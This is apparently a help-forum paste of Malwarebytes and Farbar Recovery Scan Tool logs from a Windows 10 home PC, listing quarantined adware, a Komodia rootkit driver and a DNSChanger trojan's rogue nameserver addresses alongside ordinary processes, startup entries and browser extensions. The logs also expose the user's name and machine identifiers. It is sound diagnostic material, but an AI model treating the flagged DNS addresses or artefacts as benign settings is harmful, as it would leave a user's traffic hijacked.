PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.OpuKiutkuvaod, Quarantined, [9921bdc8544501359613f617c93ac739],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.OpuKiutkuvaod.1, Quarantined, [c7f31d68d6c3e2548623ca43b44f27d9],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.PesdMehrefj, Quarantined, [308a9ce9455454e2f1b83cd18f743fc1],
PUP.Optional.Komodia, HKLM\SOFTWARE\CLASSES\QacsauolLib.PesdMehrefj.1, Quarantined, [94265e27643540f67039ff0e01021de3],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.CiimLheamojbad, Quarantined, [3882d4b1cccd1c1a5653b7560af98977],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.CiimLheamojbad.1, Quarantined, [ffbb42432574c96d7a2f1feed42fd42c],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.DodpGuokdos, Quarantined, [2a90d1b414851323feab9a73a95a4db3],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.DodpGuokdos.1, Quarantined, [3387305501981d192a7f4bc218ebcf31],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.JacCodwugeif, Quarantined, [2991dfa699006ccab4f544c9c83baa56],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.JacCodwugeif.1, Quarantined, [dcde0c795a3f181e75345db0db281ee2],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.OpuKiutkuvaod, Quarantined, [2b8fd1b42772989e17922fdec43f3ec2],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.OpuKiutkuvaod.1, Quarantined, [ffbb1f667920b5810a9f4bc23ac943bd],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.PesdMehrefj, Quarantined, [cded50359dfc78be1d8ca766e91aba46],
PUP.Optional.Komodia, HKLM\SOFTWARE\WOW6432NODE\CLASSES\QacsauolLib.PesdMehrefj.1, Quarantined, [d4e6a9dc9702c472faaf868740c36d93],
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{C8C9C24E-7C07-49A7-8246-3A33AEDB5E65}, Quarantined, [7a406d18edacf3432d7ad73a798b3ec2],
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{7008D7D4-671A-438A-AB8B-C3A378FFDEF6}, Quarantined, [86349ce96d2c999d01bcbf4ed1329d63],
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\{7008D7D4-671A-438A-AB8B-C3A378FFDEF6}, Quarantined, [10aa8cf97e1bc1752c9115f8b152b947],
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\SOFTWARE\{7008D7D4-671A-438A-AB8B-C3A378FFDEF6}, Quarantined, [c7f31a6b8d0cda5cc5f78687f11226da],

Registry Values: 5
PUP.Optional.MindSpark, HKLM\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\LOW RIGHTS\ELEVATIONPOLICY\{c8c9c24e-7c07-49a7-8246-3a33aedb5e65}|AppPath, C:\Program Files (x86)\CouponXplorer_5z\bar\1.bin, Quarantined, [7a406d18edacf3432d7ad73a798b3ec2]
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-18\SOFTWARE\{7008D7D4-671A-438A-aB8B-C3A378FFDEF6}|Name, C:\Program Files\Phrase Professor191220150009\Uevilvie.exe, Quarantined, [86349ce96d2c999d01bcbf4ed1329d63]
PUP.Optional.DeskBar, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION|DeskBar.exe, 8888, Quarantined, [b6044b3a5a3f69cd907cd799e51f5aa6]
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\SOFTWARE\{7008D7D4-671A-438A-aB8B-C3A378FFDEF6}|Name, C:\Program Files\Phrase Professor191220150009\Uevilvie.exe, Quarantined, [10aa8cf97e1bc1752c9115f8b152b947]
PUP.Optional.VBates.BrwsrFlsh, HKU\S-1-5-21-1018505005-2824899964-3694806622-1001_Classes\SOFTWARE\{7008D7D4-671A-438A-aB8B-C3A378FFDEF6}|Name, C:\Program Files\Phrase Professor191220150009\Uevilvie.exe, Quarantined, [c7f31a6b8d0cda5cc5f78687f11226da]

Registry Data: 1
Trojan.DNSChanger.DNSRst, HKLM\SYSTEM\CURRENTCONTROLSET\SERVICES\TCPIP\PARAMETERS|NameServer, 82.163.142.7 95.211.158.134, Good: (8.8.8.8), Bad: (82.163.142.7 95.211.158.134),Replaced,[7c3e2c5983168ea8e26b23ed0104e21e]

Folders: 1
Adware.LaSuperba, C:\uninst, Quarantined, [c4f6760fadec25115bcbd36758add32d],

Files: 10
Rootkit.Komodia.PUA, C:\WINDOWS\SYSTEM32\drivers\bsdriver.sys, Delete-on-Reboot, [e1d557efc98c6c64feb6c3e3369839c0],
PUP.Optional.Komodia.WnskRST, C:\Windows\System32\Qacsauol64.dll, Quarantined, [25957b0a1d7c44f27e0d4f5f976ad12f],
PUP.Optional.Komodia.WnskRST, C:\Windows\SysWOW64\Qacsauol.dll, Quarantined, [36845530eaaf9f97afa2b2fc956c2cd4],
PUP.Optional.OptimumInstaller, C:\Users\levilaing\Downloads\Setup.exe, Quarantined, [e0daa0e5a5f4fa3cb1e7ef53ed14639d],
PUP.Optional.Komodia.WnskRST, C:\Windows\System32\QacsauolOff.ini, Quarantined, [dedcc3c2584105315b4f23ea9b68b44c],
PUP.Optional.Komodia.WnskRST, C:\Windows\SysWOW64\Qacsauol.ini, Quarantined, [3f7b98ed80197cba8c1ea36a2ad9bf41],
PUP.Optional.Komodia.WnskRST, C:\Windows\SysWOW64\QacsauolOff.ini, Quarantined, [843697ee9306d165adfd937ad03341bf],
PUP.Optional.FakeIELaunch, C:\Users\levilaing\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet-Explorer Browser.lnk, Quarantined, [d3e711741c7dcd697d9db681ab590ef2],
Adware.LaSuperba, C:\uninst\uninstall.html, Quarantined, [c4f6760fadec25115bcbd36758add32d],
PUP.Optional.HijackHosts.Gen, C:\Windows\System32\puo\nufn\mhno.dat, Quarantined, [506a93f282171c1ab437a88d9b6a738d],

Physical Sectors: 0
(No malicious items detected)


(end)

Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:05-03-2016 01
Ran by levilaing (administrator) on LEVISPC (09-03-2016 19:47:55)
Running from C:\Users\levilaing\Desktop
Loaded Profiles: levilaing (Available Profiles: levilaing)
Platform: Windows 10 Home Version 1511 (X64) Language: English (United States)
Internet Explorer Version 11 (Default browser: FF)
Boot Mode: Normal
Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo...very-scan-tool/

==================== Processes (Whitelisted) =================

(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

(HP) C:\Program Files (x86)\HP SimplePass\TrueSuiteService.exe
(Intel Corporation) C:\Windows\System32\igfxCUIService.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\stacsv64.exe
(Hewlett-Packard Company) C:\Windows\System32\hpservice.exe
(Intel Corporation) C:\Windows\SysWOW64\IntelCpHeciSvc.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamscheduler.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbamservice.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPWMISVC.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\FitbitConnectService.exe
(Intel® Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
() C:\Program Files (x86)\Canon\IJPLM\ijplmsvc.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\DAL\Jhi_service.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnhService.exe
() C:\Windows\System32\valWBFPolicyService.exe
(Realsil Microelectronics Inc.) C:\Program Files (x86)\Realtek\Realtek PCIE Card Reader\RIconMan.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\FWService\IntelMeFWService.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\LMS\LMS.exe
(Intel Corporation) C:\Program Files (x86)\Intel\Intel® Management Engine Components\UNS\UNS.exe
(Malwarebytes) C:\Users\levilaing\Desktop\Malwarebytes Anti-Malware\mbam.exe
(AuthenTec Inc.) C:\Program Files (x86)\HP SimplePass\TouchControl.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPEnh.exe
(Microsoft Corporation) C:\Windows\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
() C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
(Synaptics Incorporated) C:\Program Files\Synaptics\SynTP\SynTPHelper.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\ns.exe
(Intel Corporation) C:\Windows\System32\igfxEM.exe
(Intel Corporation) C:\Windows\System32\igfxHK.exe
() C:\Program Files (x86)\HP SimplePass\IEWebSiteLogon.exe
(Microsoft Corporation) C:\Windows\System32\SettingSyncHost.exe
(IDT, Inc.) C:\Program Files\IDT\WDM\sttray64.exe
(Fitbit, Inc.) C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe
(Hewlett-Packard Development Company, L.P.) C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe
(CyberLink) C:\Program Files (x86)\CyberLink\Power2Go8\CLMLSvc_P2G8.exe
(CyberLink) C:\Program Files (x86)\CyberLink\YouCam\YCMMirage.exe
() C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe
(Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
(Egis Technology Inc.) C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe
(Hewlett-Packard Company) C:\Program Files (x86)\Hewlett-Packard\Shared\hpqwmiex.exe
(Mozilla Corporation) C:\Program Files (x86)\Mozilla Firefox\firefox.exe
(Symantec Corporation) C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\conathst.exe
(Microsoft Corporation) C:\Windows\ImmersiveControlPanel\SystemSettings.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe
(Microsoft Corporation) C:\Windows\System32\dllhost.exe


==================== Registry (Whitelisted) ===========================

(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

HKLM\...\Run: [SysTrayApp] => C:\Program Files\IDT\WDM\sttray64.exe [1664000 2013-10-14] (IDT, Inc.)
HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [444904 2012-09-20] (Adobe Systems Incorporated)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [3944136 2015-07-17] (Synaptics Incorporated)
HKLM-x32\...\Run: [RemoteControl10] => C:\Program Files (x86)\CyberLink\PowerDVD10\PDVD10Serv.exe [91432 2012-03-28] (CyberLink Corp.)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe [581024 2012-09-07] (Hewlett-Packard Development Company, L.P.)
HKLM-x32\...\Run: [EgisTecPMMUpdate] => C:\Program Files (x86)\EgisTec IPS\PmmUpdate.exe [401192 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [EgisUpdate] => C:\Program Files (x86)\EgisTec IPS\EgisUpdate.exe [201512 2009-12-08] (Egis Technology Inc.)
HKLM-x32\...\Run: [VitaKeyTSR] => C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisTSR.exe [379248 2010-03-25] (Egis Technology Inc. )
HKLM-x32\...\Run: [SwitchBoard] => C:\Program Files (x86)\Common Files\Adobe\SwitchBoard\SwitchBoard.exe [517096 2010-02-19] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [AdobeCS6ServiceManager] => C:\Program Files (x86)\Common Files\Adobe\CS6ServiceManager\CS6ServiceManager.exe [1075296 2013-04-25] (Adobe Systems Incorporated)
HKLM-x32\...\Run: [BCSSync] => C:\Program Files (x86)\Microsoft Office\Office14\BCSSync.exe [89184 2012-11-05] (Microsoft Corporation)
HKLM-x32\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKLM-x32\...\Run: [Wondershare Helper Compact.exe] => C:\Program Files (x86)\Common Files\Wondershare\Wondershare Helper Compact\WSHelper.exe
HKLM-x32\...\Run: [CanonQuickMenu] => C:\Program Files (x86)\Canon\Quick Menu\CNQMMAIN.EXE [1282120 2013-05-02] (CANON INC.)
HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [594992 2016-01-29] (Oracle Corporation)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Power2GoExpress8] => C:\Program Files (x86)\CyberLink\Power2Go8\Power2GoExpress8.exe [1711680 2013-01-27] (CyberLink Corp.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Fitbit Connect] => C:\Program Files (x86)\Fitbit Connect\Fitbit Connect.exe [4369952 2014-11-07] (Fitbit, Inc.)
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [Dashlane] => C:\Users\levilaing\AppData\Roaming\Dashlane\Dashlane.exe [227712 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Run: [DashlanePlugin] => C:\Users\levilaing\AppData\Roaming\Dashlane\DashlanePlugin.exe [285568 2016-02-29] ()
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6281.1202_1\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\RunOnce: [Uninstall C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64] => C:\WINDOWS\system32\cmd.exe /q /c rmdir /s /q "C:\Users\levilaing\AppData\Local\Microsoft\OneDrive\17.3.6301.0127\amd64"
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoChangeStartMenu] 0
HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Policies\Explorer: [NoLogOff] 0
Lsa: [Notification Packages] EgisPwdFilter EgisDSPwdFilter
ShellIconOverlayIdentifiers: [  OverlayExcluded] -> {4433A54A-1AC8-432F-90FC-85F045CF383C} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayPending] -> {F17C0B1E-EF8E-4AD4-8E1B-7D7E8CB23225} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)
ShellIconOverlayIdentifiers: [  OverlayProtected] -> {476D0EA3-80F9-48B5-B70B-05E677C9C148} => C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\buShell.dll [2015-11-05] (Symantec Corporation)

==================== Internet (Whitelisted) ====================

(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

Tcpip\Parameters: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{28a014ed-4ae8-49f4-a954-4f38e07b24fb}: [DhcpNameServer] 82.163.142.7
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [NameServer] 8.8.8.8,8.8.4.4
Tcpip\..\Interfaces\{556f7f8c-c8e8-4a6f-8480-14d98b819937}: [DhcpNameServer] 68.105.28.11 68.105.29.11 68.105.28.12
Tcpip\..\Interfaces\{85ffa754-8db8-4cb7-b1d1-1001444e1282}: [DhcpNameServer] 82.163.142.7

Internet Explorer:
==================
SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
SearchScopes: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL =
BHO: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\x64\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Dashlane BHO -> {42D79B50-CC4A-4A8E-860F-BE674AF053A2} -> C:\Users\levilaing\AppData\Roaming\Dashlane\ie\Dashlanei.dll [2016-02-29] (Dashlane)
BHO-x32: Norton Identity Protection -> {602ADB0E-4AFF-4217-8AA1-95DAC4DFA408} -> C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
BHO-x32: Wondershare Video Converter Ultimate -> {65DEE40A-3E93-4cae-9F98-B8E06DCEE2BF} -> C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRIEPlugin.dll [2013-06-18] (Wondershare Software Co., Ltd.)
BHO-x32: Groove GFS Browser Helper -> {72853161-30C5-4D22-B7F9-0BBC1D38A37E} -> C:\Program Files (x86)\Microsoft Office\Office14\GROOVEEX.DLL [2013-12-19] (Microsoft Corporation)
BHO-x32: Java™ Plug-In SSV Helper -> {761497BB-D6F0-462C-B6EB-D4DAF1D92D43} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\ssv.dll [2016-02-17] (Oracle Corporation)
BHO-x32: EgisPBIE Class -> {7B51CCBE-4AF9-44A6-BDAB-D7F7E4C4E6F9} -> C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\EgisPBIE.dll [2010-03-25] (Egis Technology Inc.)
BHO-x32: Office Document Cache Handler -> {B4F3A835-0E21-4959-BA22-42B3008E02FF} -> C:\Program Files (x86)\Microsoft Office\Office14\URLREDIR.DLL [2013-03-06] (Microsoft Corporation)
BHO-x32: Java™ Plug-In 2 SSV Helper -> {DBC80044-A445-435b-BC74-9C25C1C588A9} -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\jp2ssv.dll [2016-02-17] (Oracle Corporation)
Toolbar: HKLM - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKLM-x32 - Dashlane Toolbar - {669695BC-A811-4A9D-8CDF-BA8C795F261C} - C:\Users\levilaing\AppData\Roaming\Dashlane\ie\KWIEBar.dll [2016-02-29] (Dashlane)
Toolbar: HKLM-x32 - Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)
Toolbar: HKU\S-1-5-21-1018505005-2824899964-3694806622-1001 -> Norton Toolbar - {7FEBEFE3-6B19-4349-98D2-FFB09D4B49CA} - C:\Program Files (x86)\Norton Security\Engine64\22.5.5.15\coIEPlg.dll [2015-11-05] (Symantec Corporation)

FireFox:
========
FF ProfilePath: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default
FF DefaultSearchEngine: DuckDuckGo
FF DefaultSearchEngine.US: DuckDuckGo
FF SelectedSearchEngine: DuckDuckGo
FF Homepage: about:home
FF Plugin: @adobe.com/FlashPlayer -> C:\WINDOWS\system32\Macromed\Flash\NPSWF64_20_0_0_306.dll [2016-02-09] ()
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~1\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect64.dll [2012-09-20] (Adobe Systems)
FF Plugin: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\Win64Plugin\npAdobeExManDetectX64.dll [2013-12-02] (Adobe Systems)
FF Plugin-x32: @adobe.com/FlashPlayer -> C:\WINDOWS\SysWOW64\Macromed\Flash\NPSWF32_20_0_0_306.dll [2016-02-09] ()
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw_1205146.dll [2013-10-25] (Adobe Systems, Inc.)
FF Plugin-x32: @authentec.com/ffwloplugin -> C:\Program Files (x86)\HP SimplePass\npffwloplugin.dll [2013-06-07] ( HP)
FF Plugin-x32: @google.com/npPicasa3,version=3.0.0 -> C:\Program Files (x86)\Google\Picasa3\npPicasa3.dll [2015-10-13] (Google, Inc.)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI ipt;version=2.1.42 -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIIPT.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @intel-webapi.intel.com/Intel WebAPI updater -> C:\Program Files (x86)\Intel\Intel® Management Engine Components\IPT\npIntelWebAPIUpdater.dll [2012-06-06] (Intel Corporation)
FF Plugin-x32: @java.com/DTPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\dtplugin\npDeployJava1.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @java.com/JavaPlugin,version=11.73.2 -> C:\Program Files (x86)\Java\jre1.8.0_73\bin\plugin2\npjp2.dll [2016-02-17] (Oracle Corporation)
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.41212.0\npctrl.dll [2015-12-11] ( Microsoft Corporation)
FF Plugin-x32: @microsoft.com/OfficeAuthz,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPAUTHZ.DLL [2010-01-09] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/SharePoint,version=14.0 -> C:\PROGRA~2\MICROS~1\Office14\NPSPWRAP.DLL [2010-03-24] (Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=16.4.3528.0331 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2014-03-31] (Microsoft Corporation)
FF Plugin-x32: @tools.google.com/Google Update;version=3 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: @tools.google.com/Google Update;version=9 -> C:\Program Files (x86)\Google\Update\1.3.29.5\npGoogleUpdate3.dll [2016-02-02] (Google Inc.)
FF Plugin-x32: adobe.com/AdobeAAMDetect -> C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\CCM\Utilities\npAdobeAAMDetect32.dll [2012-09-20] (Adobe Systems)
FF Plugin-x32: adobe.com/AdobeExManDetect -> C:\Program Files (x86)\Adobe\Adobe Extension Manager CS6\npAdobeExManDetectX86.dll [2013-12-02] (Adobe Systems)
FF SearchPlugin: C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\searchplugins\duckduckgo.xml [2014-10-16]
FF Extension: Ixquick Toolbar - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\extensions\{0D4B5813-2CB5-439D-839C-4638597EFAFA}.xpi [2016-01-12]
FF Extension: Dashlane - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2015-12-22]
FF Extension: DuckDuckGo Plus - C:\Users\levilaing\AppData\Roaming\Mozilla\Firefox\Profiles\20re3c18.default\Extensions\[email protected] [2016-03-09]
FF Extension: TrueSuite Website Logon - C:\Program Files (x86)\Mozilla Firefox\distribution\bundles\[email protected] [2016-02-12] [not signed]
FF HKLM\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF Extension: Norton Identity Safe - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon [2016-01-18]
FF HKLM-x32\...\Firefox\Extensions: [{41ecbc0b-34d5-4cd4-935f-253a30e2cb7e}] - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt
FF Extension: SimplePass Online Accounts Extension  - C:\Program Files (x86)\Hewlett-Packard\HP SimplePass Identity Protection\FFExt [2013-12-13] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt
FF Extension: Wondershare Video Converter Ultimate - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt [2015-07-09] [not signed]
FF HKLM-x32\...\Firefox\Extensions: [{C1A2A613-35F1-4FCF-B27F-2840527B6556}] - C:\ProgramData\Norton\{0C55C096-0F1D-4F28-AAA2-85EF591126E7}\NS_22.5.4.24\coFFAddon
FF HKU\S-1-5-21-1018505005-2824899964-3694806622-1001\...\Firefox\Extensions: [{8D150B8F-EFE8-45a3-A4A3-053020F48FAC}] - C:\Program Files (x86)\Wondershare\VideoConverterFree\SVRFirefoxExt

Chrome:
=======
CHR Profile: C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default
CHR Extension: (Google Docs) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\aohghmighlieiainnegkcijnfilokake [2014-07-07]
CHR Extension: (Google Drive) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\apdfllckaahabafndbhieahigkjlhalf [2014-07-07]
CHR Extension: (YouTube) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\blpcfgokakmgnkcojhhkbfbldkacnbeo [2014-07-07]
CHR Extension: (Google Search) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\coobgpohoikkiipiblmjeljniedjpjpf [2014-07-07]
CHR Extension: (Website Logon) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\kanflfepiobnpjbljmngfgegijhdpljm [2014-07-07]
CHR Extension: (Google Wallet) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda [2014-07-07]
CHR Extension: (Gmail) - C:\Users\levilaing\AppData\Local\Google\Chrome\User Data\Default\Extensions\pjkljhegncpnkpknbcohdijeoejaedia [2014-07-07]
CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files (x86)\Norton Security\Engine\22.5.5.15\Exts\Chrome.crx [2015-12-24]
CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx
CHR HKLM-x32\...\Chrome\Extension: [kanflfepiobnpjbljmngfgegijhdpljm] - C:\Program Files (x86)\HP SimplePass\tschrome.crx [2013-04-01]

==================== Services (Whitelisted) ========================

